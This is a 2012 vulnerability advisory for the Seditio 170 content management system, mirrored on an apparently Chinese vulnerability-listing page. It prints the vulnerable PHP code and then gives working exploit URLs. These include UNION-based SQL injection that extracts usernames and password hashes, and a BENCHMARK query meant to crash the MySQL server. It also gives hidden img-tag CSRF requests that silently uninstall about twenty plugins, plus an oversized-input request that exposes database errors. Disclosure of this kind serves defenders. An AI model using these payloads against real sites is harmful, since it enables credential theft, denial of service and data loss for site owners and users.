Seditio 170 Cross Site Request Forgery / SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047622 漏洞类型
发布时间 2012-04-13 更新时间 2012-04-13
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012040110
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
============================================================
Vulnerable Software: Seditio 170 (seditio-build170.20120302)
Downloaded from:http://www.neocrome.net/files/code/seditio-build170.20120302.rar
(MD5 SUM:beb6adc6abb56f947698c1efdbae9430 *seditio-build170.20120302.rar)
============================================================
Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
===========================================================
Vuln Desc:
Seditio 170 (seditio-build170.20120302) is Prone to SQL injection vulnerability.
Note:*For successfull exploitation requires administrative authentication to system.*


//system/core/admin/admin.hits.inc.php
//Vulnerable Code Section
$f = sed_import('f','G','TXT');
$v = sed_import('v','G','TXT');

if ($f=='year' || $f=='month')
	{
	$adminpath[] = array ("admin.php?m=hits&f=".$f."&v=".$v, "(".$v.")");
	$sql = sed_sql_query("SELECT * FROM $db_stats WHERE stat_name LIKE '$v%' ORDER BY stat_name DESC");


Exploit:
Extract user(s)/admin(s)/moder(s) details:
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,user_name%20from%20sed170_users%20limit%201--%20or%271%27!=%271--

http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271--

http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users--%20or%271%27!=%271--

http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271--


Overload MYSQL server:(As result Mysql Server Goes Down+High CPU Load in other words: Create Denial Of Service throught sql injection)
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--
Note: It can be mixed with CSRF especially if you have no any access to system as admin.
In eg:
<img src="http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--" />

Print screen:
http://s019.radikal.ru/i625/1204/6d/842088135393.png




Seditio 170 (seditio-build170.20120302) also prone to CSRF (Cross Site Request Forgery)
vulnerability because it doesn't checks request validity throught $_GET request
and as result we can silently Uninstall/stop/pause/start plugins which may cause:
Data loss,functionality loss.
===========================================================================================
/*Tested with Seditio 165/seditio-build170.20120302   versions [Uninstall Plugins] CSRF exploit.*/
//Works for me.
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=Highslide_iResizer&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=adminqv&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=cleaner&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=contact&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=forumstats&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=gallery&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=ipsearch&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=massmovetopics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=news&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=passrecover&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=recentitems&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=search&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=skineditor&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=statistics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=textboxer2&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=dbtools&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmoku&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=modcp&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=guestbook&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmblocker_se&b=uninstall" />
==============================================================================================



Information Disclosure:

Try to post in inputs very long string.

Application will expose column.names which is not acceptable anymore from security consideration.

In eg:
Client Side validation:
<tr>
<td>Location:</td>
<td><input type="text" class="text" name="ruserlocation" value="" size="32" maxlength="64" /></td>
</tr>

http://192.168.0.15/learn/128/sed/seditio.170/users.php?m=profile&a=update&x=EONODP
Post data:
userid=1&curpassword=&ruserhideemail=1&ruserpmnotify=0&ruserskin=artic&ruserlang=en&rusercountry=00&ruserlocation=aaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&rusertimezone=-12&ruserwebsite=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&
ryear=0&rmonth=0&rday=0&ruseroccupation=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&rusergender=U&MAX_FILE_SIZE=65536000&userfile=&rusertext=&rnewpass1=&rnewpass2=&x=EONODP



Error:
Title of your site
2012-04-12 04:55 / Fatal error : SQL error : Data too long for column 'user_occupation' at row 1



Persistent Cross Site Scripting vulnerability still unfixed.(from Seditio 161)
Same Info/Path disclosures still unfixed.(from Seditio 161).
("Thanks" for TinyMCE editor and thanks to client side validation)(from Seditio 161)
I notified about it here+ to vendor too but it still unfixed in 170.20120302 too.
====================PLEASE==HELP TO KEEP SEDITIO SECURE=================================


+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team.
++++++++++++++++++++++++++++++
Thank you.

/AkaStep ^_^